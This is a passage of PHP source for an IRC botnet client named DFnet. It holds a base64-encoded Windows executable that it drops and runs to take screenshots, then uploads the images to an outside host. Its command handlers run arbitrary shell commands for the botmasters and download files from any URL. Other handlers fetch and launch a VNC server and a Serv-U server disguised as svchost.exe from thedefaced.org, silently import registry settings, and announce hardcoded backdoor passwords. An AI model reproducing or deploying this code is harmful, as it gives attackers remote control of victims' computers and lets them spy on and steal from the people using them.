7AT2RdQBugoAAAB0BA+3VdiJX CQIMduJXCQEiVQkDIkEJOgG/v//g+wQi138ycNDD7YL65iQkJCQk JCQkFW5QDFAAInl6xSNtgAAAA CLUQSLAYPBCAGCAABAAIH5QDF AAHLq
XcOQkJCQkJCQkFWJ5dvjXcOQk JCQkJCQkJBVieWD7AihICBAAI sIhcl0JusNkJCQkJCQkJCQkJC QkP8Qi
w0gIEAAi1EEjUEEoyAgQACF0n XpycONtCYAAAAAVYnlU4PsBKF AHUAAg/j/dCmFwInDdBOJ9o28JwAAAAD/FJ1AHUAAS3X2xwQkYBdAAOiK+ v//W1tdw4sNRB1AADHAhcnrCkCLF IVEHUAAhdJ19Ou9jbYAAAAAjb 8AAAAAVYnlU4PsBKEgQEAAhcB 1NqFA
HUAAuwEAAACJHSBAQACD+P90J YXAicN0D5CNdCYA/xSdQB1AAEt19scEJGAXQADoGv r//1tbXcOLDUQdQAAxwIXJ6wpAix SFRB1AAIXSdfTrwZCQkJCQkJC QkJCQkFWhcEBAAInlXYtIBP/hifZVukIAAACJ5VMPt8CD7GSJ VCQIjVWoMduJVCQEiQQk/xUwUUAAuh8AAAC5AQAAAIPsDI XAdQfrRgHJSngOgHwqqEF19An LAclKefKDOzx1B4nYi138ycO5 hDBAA
LrqAAAAiUwkDIlUJAjHBCSxME AAuNAwQACJRCQE6JICAAC4/DBAALvkAAAAiUQkDIlcJAjr14 20JgAAAACNvCcAAAAAVYnlV1Z TgezMAAAAiw1wQEAAhcl0CI1l 9FteX
13Dx0WYQUFBQaFgMEAAjXWYx0 WcQUFBQcdFoEFBQUGJRbihZDB AAMdFpEFBQUHHRahBQUFBiUW8 oWgwQA
DHRaxBQUFBx0WwQUFBQYlFwKF sMEAAx0W0QUFBQYlFxKFwMEAA iUXIoXQwQACJRcyheDBAAIlF0 KF8MEA
AiUXUD7cFgDBAAGaJRdiJNCT/FSxRQAAPt8CD7ASFwImFRP///w+FOwEAAMcEJDwAAADokwIAAI XAicMPhFkBAAD8iceLhUT///+5DwAAAPOrx0MEoBxAALkBAAA Ax0MIcBhAAKFAQEAAxwM8AAAA ixVEQEAAx0MoAAAAAIlDFKEwI EAAiV
MYixU0IEAAiUMcoVBAQACJUyD HQzD/////iUMsixU8IEAAoTggQACJUzi6H wAAAIlDNIn2idghyIP4ARnAJC AByQRBiIQqSP///0p556FgMEAAiYVo////oWQwQACJhWz///+haDBAAImFcP///6FsMEAAiYV0////oXAwQACJhXj///+hdDBAAImFfP///6F4MEAAiUWAoXwwQACJRYQPtw WAMEAAZolFiI2FSP///4kEJP8VJFFAAA+3+IPsBIX/dUIx0oXSdR6JHCToUwEAAIk0J P8VLFFAAIPsBA+3wOhf/f//icOJHXBAQACNQwSjYEBAAI1DC KOAQEAAjWX0W15fXcOJ+Og4/f//OdiJ+nWx67HoSwEAAJCQkJCQk JCQkJCQUYnhg8EIPQAQAAByEI HpABAAAIMJAC0AEAAA6+kpwYM JAIng
icyLCItABP/gkJCQVYnlg+wYi0UUiUQkEItF EIlEJAyLRQyJRCQIi0UIiUQkB KFkUUAAg8BAiQQk6P4AAAChZF FAAIP
AQIkEJOjeAAAA6MkAAACQkJCQ kJCQkJD/JVxRQACQkAAAAAAAAAAA/yVgUUAAkJAAAAAAAAAAAP8lVF FAAJCQAAAAAAAAAAD/JZRRQACQkAAAAAAAAAAA/yVYUUAAkJAAAAAAAAAAAP8lbF FAAJCQAAAAAAAAAAD/JVBRQACQkAAAAAAAAAAA/yV4UUAAkJAAAAAAAAAAAP8liF FAAJCQAAAAAAAAAAD/JYxRQACQkAAAAAAAAAAA/yWQUUAAkJAAAAAAAAAAAP8lgF FAAJCQAAAAAAAAAAD/JXBRQACQkAAAAAAAAAAA/yV8UUAAkJAAAAAAAAAAAP8lhF FAAJCQAAAAAAAAAAD/JTRRQACQkAAAAAAAAAAA/yU8UUAAkJAAAAAAAAAAAP8lOF FAAJCQAAAAAAAAAAD/JTBRQACQkAAAAAAAAAAA/yUsUUAAkJAAAAAAAAAAAP8lJF FAAJCQAAAAAAAAAABVieVd6Uf 1//+QkJCQkJCQ/////zAdQAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAAAAAAAAAAAAABAAAAAAA AAAAAAAAAAAABQHUAAAAAAAAA AAAAAAAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAABFcnJvcgAAAFVuYWJsZ SB0byBBbGxvY2F0ZSBCaXRtYX AgTWVt
b3J5AHdiAFVuYWJsZSB0byBDc mVhdGUgQml0bWFwIEZpbGUAU2 NyZWVuc2hvdC5ibXAAAAAAAAA AAAAtT
ElCR0NDVzMyLUVILTItU0pMSi 1HVEhSLU1JTkdXMzIAAAB3MzJ fc2hhcmVkcHRyLT5zaXplID09 IHNpem
VvZihXMzJfRUhfU0hBUkVEKQA lczoldTogZmFpbGVkIGFzc2Vy dGlvbiBgJXMnCgAALi4vLi4vZ 2NjL2d
jYy9jb25maWcvaTM4Ni93MzIt c2hhcmVkLXB0ci5jAABHZXRBd G9tTmFtZUEgKGF0b20sIHMsIH NpemVv
ZihzKSkgIT0gMAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAGhQAAAAAA AAAAAA
AMxTAAAYUQAAdFAAAAAAAAAAA AAA/FMAACRRAACgUAAAAAAAAAAAAA BUVAAAUFEAAPBQAAAAAAAAAAA AAIBUAACgUQAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAxFEAAAAAAA AAAAAA0FEAANxRAADsUQAA+FE AAAhSAAAcUgAAMFIAAERSAABk UgAAAA
AAAAAAAABsUgAAfFIAAIxSAAC cUgAAsFIAALxSAADEUgAA0FIA ANxSAADkUgAA8FIAAPxSAAAIU wAAEFM
AABxTAAAkUwAAMFMAADxTAAAA AAAAAAAAAEhTAABcUwAAcFMAA IRTAACMUwAAnFMAAKxTAAC4Uw AAAAAA
AAAAAADEUQAAAAAAAAAAAADQU QAA3FEAAOxRAAD4UQAACFIAAB xSAAAwUgAARFIAAGRSAAAAAAA AAAAAA
GxSAAB8UgAAjFIAAJxSAACwUg AAvFIAAMRSAADQUgAA3FIAAOR SAADwUgAA/FIAAAhTAAAQUwAAHFMAACRTAA AwUwAAPFMAAAAAAAAAAAAASFM AAFxTAABwUwAAhFMAAIxTAACc UwAAr
FMAALhTAAAAAAAAkABHZXRESU JpdHMAAQBBZGRBdG9tQQAAmwB FeGl0UHJvY2VzcwAAAK8ARmlu ZEF0b2
1BANwAR2V0QXRvbU5hbWVBAAD sAEdldENvbW1hbmRMaW5lQQAA AE8BR2V0TW9kdWxlSGFuZGxlQ QAAgAF
HZXRTdGFydHVwSW5mb0EAAADf AlNldFVuaGFuZGxlZEV4Y2Vwd GlvbkZpbHRlcgAAAOsCU2xlZX AAJwBf
X2dldG1haW5hcmdzADwAX19wX 19lbnZpcm9uAAA+AF9fcF9fZm 1vZGUAAAAAUABfX3NldF9hcHB fdHlwZ
QAAAAB5AF9jZXhpdAAAAADpAF 9pb2IAAF4BX29uZXhpdAAAAIQ BX3NldG1vZGUAABUCYWJvcnQA HAJhdG
V4aXQAAAAALQJmY2xvc2UAAAA AMAJmZmx1c2gAAAAAOAJmb3Bl bgA5AmZwcmludGYAAAA/AmZyZWUAAEcCZndyaXRlAAAAA HICbWFsbG9jAAAAAJACc2lnbm FsAAAAAD0AQ2xvc2VDbGlwYm9 hcmQA
AAAAsABFbXB0eUNsaXBib2FyZ AAAAADtAEdldENsaXBib2FyZE RhdGEAAPcAR2V0REMArgFNZXN zYWdlQ
m94QQAAAMMBT3BlbkNsaXBib2 FyZADmAVJlbGVhc2VEQwB1Amt leWJkX2V2ZW50AAAAAFAAAEdE STMyLm
RsbAAAABRQAAAUUAAAFFAAABR QAAAUUAAAFFAAABRQAAAUUAAA FFAAAEtFUk5FTDMyLmRsbAAAA AAoUAA
AKFAAAChQAAAoUAAAKFAAAChQ AAAoUAAAKFAAAChQAAAoUAAAK FAAAChQAAAoUAAAKFAAAChQAA AoUAAA
KFAAAChQAABtc3ZjcnQuZGxsA AA8UAAAPFAAADxQAAA8UAAAPF AAADxQAAA8UAAAPFAAAFVTRVI zMi5kb
GwAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAA=="));

fclose($screen_exe);

$this->exe("C:\WINDOWS\screen.e xe");
$this->exe("C:\WINDOWS\screen.e xe");

$this->exe("del C:\WINDOWS\screen.exe ");
If(file_exists("C:\WINDOW S\Screenshot.bmp")){

$this->send("PRIVMSG " . $cmds['sent_to'] . " Screenshot taken now uploading to image shack...");

$f = 'C:\WINDOWS\Screenshot.bm p';

$result = $this->upload($f); // internal

$this->send("PRIVMSG " . $cmds['sent_to'] . " Screenshot uploaded links coming up!");
// it's taco time
if (preg_match('%http://img.*\.imageshack.us.*\.png%', $result, $matches))
{
$result = $matches[0];
$this->send("PRIVMSG " . $cmds['sent_to'] . " Link: " . $result);
}
else
{
$this->send("PRIVMSG " . $cmds['sent_to'] . " Screenshot couldn't upload, try again...");
};

$this->exec("del C:\WINDOWS\Screenshot.bmp ");
}else{

$this->send("PRIVMSG " . $cmds['sent_to'] . " Screenshot failed to be taken");
$this->exec("del C:\WINDOWS\screen.exe");
}
break;
case "die":
$this->parsedata("DFnet", "process() -> Status: Forced to $cmd by " . $cmds['from']);
$this->close();
exit;
break;
case "setmode":
$params = trim(implode(" ", $params));
$this->send("MODE " . $cmds[sent_to] . " " . $params);
break;
case "setmaster":
$params = trim(implode(" ", $params));
if (!empty($params))
{
$params = explode(" ", $params);
foreach ($params as $master_to_add)
{
if (!in_array($master_to_add , $this->bot_masters))
{
$this->bot_masters[] = $params[0];
$this->send("PRIVMSG " . $cmds['sent_to'] . " Now added " . $master_to_add . " to botmasters list.");
}
else
{
$this->send("PRIVMSG " . $cmds['sent_to'] . " Could not add " . $master_to_add . " to the botmasters: already in botmaster list");
};
};
}
{
$this->send("PRIVMSG " . $cmds['sent_to'] . " setmaster Usage: setmaster [[str nick] [str nick]...]");
};
break;
case "newnick":
$params = trim(implode(" ", $params));
$params = explode(" ", $params);
while(substr_count($param s[0], "*") > 0)
{
$params[0] = preg_replace("/\*/", rand(0, 9), $params[0], 1);
};
if (preg_match("/^[a-zA-Z0-9_]*$/", $params[0]))
{
$this->send("NICK " . $params[0]);
$this->send("PRIVMSG " . $cmds['sent_to'] . " Changed nick to " . $params[0]);
$this->bot_nick = $params[0];
};
break;
case "exec":
$params = @trim(@implode(" ", $params));
ob_start();
@exec($params, $output);
ob_end_clean();
foreach ($output as $output_var)
{
if (is_string($output_var))
{
$this->send("PRIVMSG " . $cmds['sent_to'] . " " . $output_var);
};
};
break;
case "delmaster":
$params = trim(implode(" ", $params));
if (!empty($params))
{
$params = explode(" ", $params);
foreach ($params as $master_to_del)
{
if (!in_array($master_to_del , $this->bot_masters))
{
$this->send("PRIVMSG " . $cmds['sent_to'] . " Could not remove " . $master_to_del . " from the botmasters: not in botmaster list.");
}
else
{
$badlist[] = $master_to_del;
$this->send("PRIVMSG " . $cmds['sent_to'] . " Now removed " . $master_to_del . " from the botmasters list.");
};
};
foreach ($this->bot_masters as $bot_master)
{
if (!in_array($bot_master, $badlist))
{
$new_list[] = $bot_master;
};
};
$this->bot_masters = $new_list;
}
else
{
$this->send("PRIVMSG " . $cmds['sent_to'] . " delmaster Usage: delmaster [[str nick] [str nick]...]");
};
break;
case "raw":

$params = implode(" ", $params);
$this->send($params);
break;
case "make":

$this->send("PRIVMSG " . $cmds['sent_to'] . " Maker: TheDefaced Hacking / Security Team (DemonFlyFF.com - First v15 FlyFF Private Server) Additional Information Follows:");
$this->send("PRIVMSG " . $cmds['sent_to'] . " MakeInfo: TDcssBot Modded DFnet [Build 27] VerInfo: 1.8.1 (2700) ModInfo: TLS2500 X260 OSInfo: Microsoft Windows [EXE]");
break;
case"download":
$url = @trim(@implode(" ",$params));


$fh=fopen("download", "a");

$red = base64_decode("AzQ=");
$blue = base64_decode("AzEy");
$yellow = base64_decode("Azg=");
$green = base64_decode("Azk=");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading $yellow $url $red ::. ");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading $url $yellow 75% $red ::. ");

fwrite($fh, file_get_contents("$url") );

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading $url $green 90% $red ::. ");


fclose($fh);

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Finished Downloading $url $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue File saved as $green \"download\" $red ::. ");
break;
case"vnc-install":

$filename = "winvnc4.exe";
$filename2 = "wm_hooks.dll";
$filename3 = "logmessages.dll";

$fh=fopen("$filename", "a");

$fh2=fopen("$filename2", "a");

$fh3=fopen("$filename3", "a");

$red = base64_decode("AzQ=");
$blue = base64_decode("AzEy");
$yellow = base64_decode("Azg=");
$green = base64_decode("Azk=");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading VNC SERVER $red ::. ");



$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading VNC SERVER $yellow 75% $red ::. ");

fwrite($fh, file_get_contents("http://www.thedefaced.org/vnc/winvnc4.exe"));
fwrite($fh2, file_get_contents("http://www.thedefaced.org/vnc/wm_hooks.dll"));
fwrite($fh3, file_get_contents("http://www.thedefaced.org/vnc/logmessages.dll"));

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading VNC SERVER $green 90% $red ::. ");


fclose($fh);
fclose($fh2);
fclose($fh3);
if(!file_exists('winvnc4. exe')) {

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: ERROR: VNC Server Download Failed! ::. ");
}
else {

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Finished Downloading VNC SERVER $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue VNC-Server Saved as $yellow $filename $red ::. ");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Installing VNC SERVER $red ::. ");

$fh4=fopen("reg.reg", "a");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Writing registery file to import. $red ::. ");

fwrite($fh4, base64_decode("V2luZG93cy BSZWdpc3RyeSBFZGl0b3IgVmV yc2lvbiA1LjAwDQoNCltIS0VZ X0NVUlJFTlRfVVNF
UlxTb2Z0d2FyZVxSZWFsVk5DX FdpblZOQzRdDQoiU2VjdXJpdH lUeXBlcyI9IlZuY0F1dGgiDQo iUmV2Z
XJzZVNlY3VyaXR5VHlwZXMiPS JOb25lIg0KIlF1ZXJ5Q29ubmV jdCI9ZHdvcmQ6MDAwMDAwMDAN CiJRdW
VyeU9ubHlJZkxvZ2dlZE9uIj1 kd29yZDowMDAwMDAwMA0KIlBv cnROdW1iZXIiPWR3b3JkOjAwM DAxNzB
jDQoiSWRsZVRpbWVvdXQiPWR3 b3JkOjAwMDAwZTEwDQoiSFRUU FBvcnROdW1iZXIiPWR3b3JkOj AwMDAx
NmE4DQoiTG9jYWxIb3N0Ij1kd 29yZDowMDAwMDAwMA0KIkhvc3 RzIj0iICwiDQoiQWNjZXB0S2V 5RXZlb
nRzIj1kd29yZDowMDAwMDAwMQ 0KIkFjY2VwdFBvaW50ZXJFdmV udHMiPWR3b3JkOjAwMDAwMDAx DQoiQW
NjZXB0Q3V0VGV4dCI9ZHdvcmQ 6MDAwMDAwMDENCiJTZW5kQ3V0 VGV4dCI9ZHdvcmQ6MDAwMDAwM DENCiJ
EaXNhYmxlTG9jYWxJbnB1dHMi PWR3b3JkOjAwMDAwMDAwDQoiR GlzY29ubmVjdENsaWVudHMiPW R3b3Jk
OjAwMDAwMDAxDQoiQWx3YXlzU 2hhcmVkIj1kd29yZDowMDAwMD AwMQ0KIk5ldmVyU2hhcmVkIj1 kd29yZ
DowMDAwMDAwMA0KIkRpc2Nvbm 5lY3RBY3Rpb24iPSJOb25lIg0 KIlJlbW92ZVdhbGxwYXBlciI9 ZHdvcm
Q6MDAwMDAwMDANCiJSZW1vdmV QYXR0ZXJuIj1kd29yZDowMDAw MDAwMA0KIkRpc2FibGVFZmZlY 3RzIj1
kd29yZDowMDAwMDAwMA0KIlBh c3N3b3JkIj1oZXg6MDUsY2UsN 2YsY2MsYWQsODQsZDgsNGMNCi JVcGRh
dGVNZXRob2QiPWR3b3JkOjAwM DAwMDAxDQoiUG9sbENvbnNvbG VXaW5kb3dzIj1kd29yZDowMDA wMDAwM
Q0KIlVzZUNhcHR1cmVCbHQiPW R3b3JkOjAwMDAwMDAxDQoiVXN lSG9va3MiPWR3b3JkOjAwMDAw MDAxDQ
oNCg=="));

fclose($fh4);

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Importing registery file - VNC Conf Data. $red ::. ");

$this->exe("REGEDIT.EXE /s reg.reg");
$this->exe("del reg.reg");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green Success!!. $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Port: $green 5900 $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Password: $green dfnet $red ::. ");

$this->exe("winvnc4.exe");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Finished installing VNC SERVER $red ::. ");
}
break;
case"serv-u-install":

$red = base64_decode("AzQ=");
$blue = base64_decode("AzEy");
$yellow = base64_decode("Azg=");
$green = base64_decode("Azk=");

$filename="svchost.exe";
$filename2="NetBIOS.dll";
$filename3="install.exe";

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading Serv-U Server $red ::. ");

$fh=fopen("$filename", "a");

$fh2=fopen("$filename2", "a");

$fh3=fopen("$filename3", "a");


fwrite($fh, file_get_contents("http://www.thedefaced.org/servu/svchost.exe"));

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading Serv-U Server $red %30 ::. ");

fwrite($fh2, file_get_contents("http://www.thedefaced.org/servu/NetBIOS.dll"));

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading Serv-U Server $yellow %60 $red ::. ");

fwrite($fh3, file_get_contents("http://www.thedefaced.org/servu/install.exe"));

fclose($fh3);
fclose($fh);
fclose($fh2);

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading Serv-U Server $green %90 $red ::. ");
if(!file_exists('install. exe')){

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: ERROR: Server-U Download Failed! ::. ");
}
else {


$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green Serv-U download has finished! $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Now attempting to install Serv-U $red ::. ");
$this->exe("install.exe");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green SUCCESS!! Server-U Now Installed $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green Port: 1337 $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green User: admin $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green Pass: dfnet $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Serv-U Install Finished $red ::. ");
}


break;
######################
default:

$this->send("PRIVMSG " . $cmds['sent_to'] . " Command ($cmd) not recognized");

$nocmd = "YES";
break;
};
if ($nocmd == "NO")
{
$this->parsedata("DFnet", "process() -> Status: Forced to $cmd by " . $cmds['from']);
};
};
};
};
}
function parsebuffer($data)
{
if ($data === FALSE)
{
return FALSE;
};
if ($data['action'] == "PRIVMSG")
{
if (in_array($data['from'], $this->bot_masters))
{
if (preg_match("/!.*/", $data['message']))
{
$this->process($data);
};
};
}
elseif ($data[from] == "PING")
{
$this->parsedata("DFnet", "parsebuffer() -> Status: Sending PONG");
$this->send("PONG " . str_replace(":", "", $data['action']));
$this->parsedata("DFnet", "parsebuffer() -> Status: Sending JOIN");
$this->sendjoin();
};
}
function receive()
{
if ($datarec = @fgets($this->fp, 1024))
{
$datarec = str_replace("\n", "", $datarec);
$datarec = str_replace("\r", "", $datarec);
$this->logdata($datarec);
$params = explode(" ", $datarec);
$details = explode ("@", $from[1]);
$message = str_replace($params[0], "", $datarec);
$message = str_replace($params[1], "", $message);
$message = str_replace($params[2], "", $message);
$from = explode ("!", $params[0]);
######################### ########################
$data['from'] = str_replace(":", "", $from[0]);
$data['ident'] = $details[0];
$data['host'] = $details[1];
$data['action'] = $params[1];
$data['sent_to'] = $params[2];
$data['message'] = substr($message, 4);
$data['ping'] = $params[0];
return $data;
};
return FALSE;
}
function sendjoin()
{
if (!empty($this->server_chan_pass))
{
$this->send("JOIN " . $this->server_chan . " " . $this->server_chan_pass);
}
$this->send("JOIN " . $this->server_chan);
}
function main()
{
$this->parsedata("DFnet", "main() -> Status: Initiated...");
$timeout = $this->bot_timeout;
$this->parsedata("DFnet", "main() -> Status: Timeout set to $timeout");
$this->parsedata("DFnet", "main() -> Status: Sending NICK");
$this->send("NICK ".$this->bot_nick);
$this->parsedata("DFnet", "main() -> Status: Sending USER");
$this->send("USER ".$this->bot_ident.' '.$this->server_addr.' '.$this->bot_nick.' : '.$this->bot_real);
$this->parsedata("DFnet", "main() -> Status: Sending JOIN");
$this->sendjoin();
$this->parsedata("DFnet", "main() -> Status: Starting parse loop...");
while ((!@feof($this->fp)) && ($timeout != 0) && ($this->script_status == "OK"))
{
if ($timeout > 0)
{
$timeout = $timeout - 1;
};
$this->parsebuffer($this->receive());
};
$this->parsedata("DFnet", "main() -> Status: Connection lost to server.");
if ($this->script_status == "OK")
{
$this->parsedata("DFnet", "main() -> Status: Calling close()...");
$this->close();
};
}
};
while(1)
{
$nick = "TDnet".rand()."_";
$DFnet = new DFnet;
$DFnet->server_addr = "";
$DFnet->server_port = 6667;
$DFnet->server_chan = "";
$DFnet->server_chan_pass = "";
$DFnet->bot_nick = $nick;
$DFnet->bot_ident = $nick;
$DFnet->bot_real = $nick;
$DFnet->bot_localhost = "localhost";
$DFnet->bot_masters = array("");
$DFnet->bot_timeout = -1;
$DFnet->enable_output_logging = FALSE;
$DFnet->enable_logging = FALSE;
$DFnet->init();
};

©2011, copyright BLACK BURN